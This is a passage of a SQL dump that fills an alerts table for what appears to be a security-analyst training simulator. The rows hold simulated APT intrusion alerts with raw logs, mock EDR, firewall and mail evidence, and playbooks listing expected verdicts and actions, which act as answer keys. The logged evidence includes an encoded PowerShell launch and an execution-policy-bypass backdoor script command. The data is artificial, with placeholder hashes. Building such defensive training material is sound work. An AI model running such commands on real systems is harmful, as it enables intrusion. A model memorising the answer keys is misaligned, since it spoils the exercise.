3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1233, 'Internal Network Scanning and Lateral Movement - Step 4', 'high', 'Network Traffic Analysis Tools', 'The attacker, leveraging a previously established foothold, conducted an internal network scan targeting 192.168.1.100 and 192.168.1.101. Subsequent attempts to authenticate to these systems were observed, indicating lateral movement attempts. The attacker is suspected to be after sensitive military information.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"185.123.45.67\",\"internal_scanned_ips\":[\"192.168.1.100\",\"192.168.1.101\"],\"detected_protocol\":\"RDP\",\"attempted_usernames\":[\"admin\",\"mil_user\"],\"malware_hash\":\"a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"filename\":\"malicious_tool.exe\",\"network_tool\":\"Nmap\",\"action\":\"lateral_movement_attempt\"}', '2026-02-07 21:48:01', '2026-02-19 15:48:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT group\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"File server\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a tool used by APT for network discovery\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint 
Security Logs\",\"verdict\":\"malicious\",\"details\":\"Detected during lateral movement attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1234, 'Data Exfiltration via Encrypted Channels', 'critical', 'Data Loss Prevention (DLP) Systems', 'The Lotus Blossom APT group is suspected of exfiltrating sensitive data from compromised systems using encrypted channels to evade detection. This activity is part of a larger espionage mission targeting intellectual property.', 'Exfiltration', 'T1048.003', 1, 'Closed', 142, '{\"timestamp\":\"2023-10-05T11:32:45Z\",\"source_ip\":\"192.168.45.12\",\"destination_ip\":\"203.0.113.89\",\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"exfiltrated_files\":[{\"filename\":\"confidential_report.pdf\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"}],\"action\":\"File transfer\",\"detection_system\":\"DLP\",\"encrypted_channel\":true,\"alert_id\":\"APT-2023-EXFIL-005\"}', '2026-02-07 21:48:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.45.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Lotus Blossom APT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially sensitive document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document identified by DLP.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1235, 'Initial Access: Phishing Email with Malicious Attachment', 'high', 'Email server logs', 'A spear-phishing email impersonating a trusted source was detected. The email contained a malicious attachment aimed at gaining initial access to Naikon\'s network. The attack involved delivering a known malicious document associated with Hellsing APT operations.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"sender_email\":\"trusted.source@example.com\",\"recipient_email\":\"j.doe@naikon.com\",\"subject\":\"Urgent: Q3 Report\",\"attachment\":{\"filename\":\"Q3_Report.docx\",\"hash\":\"1a79a4d60de6718e8e5b326e338ae533\",\"file_type\":\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\"},\"network\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\"},\"headers\":{\"received\":\"from mail.example.com (203.0.113.45) by mail.naikon.com\",\"user_agent\":\"Mozilla/5.0\"}}', '2026-02-07 21:48:07', '2026-02-19 15:46:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"trusted.source@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email domain associated with previous phishing attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1a79a4d60de6718e8e5b326e338ae533\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious document used in Hellsing APT campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing infrastructure.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Email with Malicious Attachment\",\"date\":\"2026-02-08T19:00:02.569Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1236, 'Execution: Exploit of Vulnerability in Office Software', 'critical', 'Endpoint protection logs', 'Upon opening the malicious attachment, a zero-day vulnerability in Office software is exploited to deploy Hellsing’s custom malware, executing it within Naikon\'s environment.', 'Vulnerability Exploit', 'T1203: Exploitation for Client Execution', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_type\":\"exploit_attempt\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"vulnerability_id\":\"CVE-2023-1234\",\"malware_name\":\"Hellsing\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_attachment\":\"invoice.docx\",\"process\":\"WINWORD.EXE\",\"destination_file\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious.dll\",\"action_taken\":\"blocked\",\"alert_id\":\"1234567890\"}', '2026-02-07 21:48:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Hellsing malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File used to exploit vulnerability.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the 
event.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1237, 'Persistence: Establishing Backdoor for Continued Access', 'high', 'Endpoint detection and response (EDR) logs', 'A stealthy backdoor was installed on Naikon\'s network by Hellsing to maintain persistent access, enabling ongoing surveillance and data collection. This step is crucial for the threat actor to ensure long-term access to the compromised systems.', 'Backdoor Installation', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T15:23:45Z\",\"event_id\":\"4624\",\"event_type\":\"Process Creation\",\"computer_name\":\"naikon-host01\",\"user\":\"naikon_user\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\Public\\\\backdoor.ps1\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"backdoor.ps1\",\"username\":\"naikon_user\"}', '2026-02-07 21:48:07', '2026-02-19 15:47:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Logs\",\"verdict\":\"suspicious\",\"details\":\"Script file used for backdoor 
installation.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"naikon_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account accessed.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1238, 'Lateral Movement: Credential Dumping and Privilege Escalation', 'critical', 'Active Directory logs', 'Hellsing adversary used dumped credentials to escalate privileges and move laterally within Naikon\'s network. The attacker accessed sensitive systems by leveraging escalated privileges.', 'Credential Dumping', 'T1003 - Credential Dumping', 1, 'closed', NULL, '{\"event_id\":4624,\"timestamp\":\"2023-10-12T14:23:45Z\",\"computer_name\":\"naikon-dc01.corp.naikon.local\",\"source_ip\":\"203.0.113.45\",\"source_port\":52874,\"destination_ip\":\"192.168.1.10\",\"destination_port\":389,\"logon_type\":3,\"logon_process_name\":\"Advapi\",\"authentication_package_name\":\"Negotiate\",\"account_name\":\"admin_user\",\"domain_name\":\"NAIKON\",\"logon_guid\":\"{D0F7F5B7-9C89-4EFD-95CB-3D2E3A4A1B1A}\",\"lm_hash\":\"aad3b435b51404eeaad3b435b51404ee\",\"ntlm_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_name\":\"mimikatz.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\"}', '2026-02-07 21:48:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Hellsing APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal server hosting Active Directory services.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"Credential used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash 
corresponds to known Mimikatz executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1239, 'Exfiltration: Data Transfer to External Server', 'critical', 'Network traffic analysis', 'Hellsing initiates data exfiltration, transferring valuable intelligence from Naikon\'s compromised systems to an external server, completing their espionage mission.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-14T03:47:22Z\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"filename\":\"intel_report_2023.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"naikon_user\",\"malware\":\"Hellsing\",\"action\":\"File Transfer\",\"status\":\"Completed\"}', '2026-02-07 21:48:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP from within the compromised network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to Hellsing malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"intel_report_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1240, 'Suspicious Email Infiltration Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting key personnel within the military sector, aiming to deliver the initial payload of the Yahoyah malware.', 'Phishing Attack', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T09:15:23Z\",\"email_subject\":\"Urgent: Updated Security Protocols\",\"from_address\":\"malicious.sender@example.com\",\"to_address\":\"j.doe@military.gov\",\"attachment_name\":\"Security_Update_2023.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"192.168.1.10\",\"malware_detected\":\"Yahoyah\",\"alert_id\":\"email-gw-20231012-001\"}', '2026-02-07 21:48:09', '2026-02-19 12:59:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious.sender@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Sender associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known phishing servers\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Yahoyah malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Infiltration Detected\",\"date\":\"2026-02-08T19:00:02.575Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
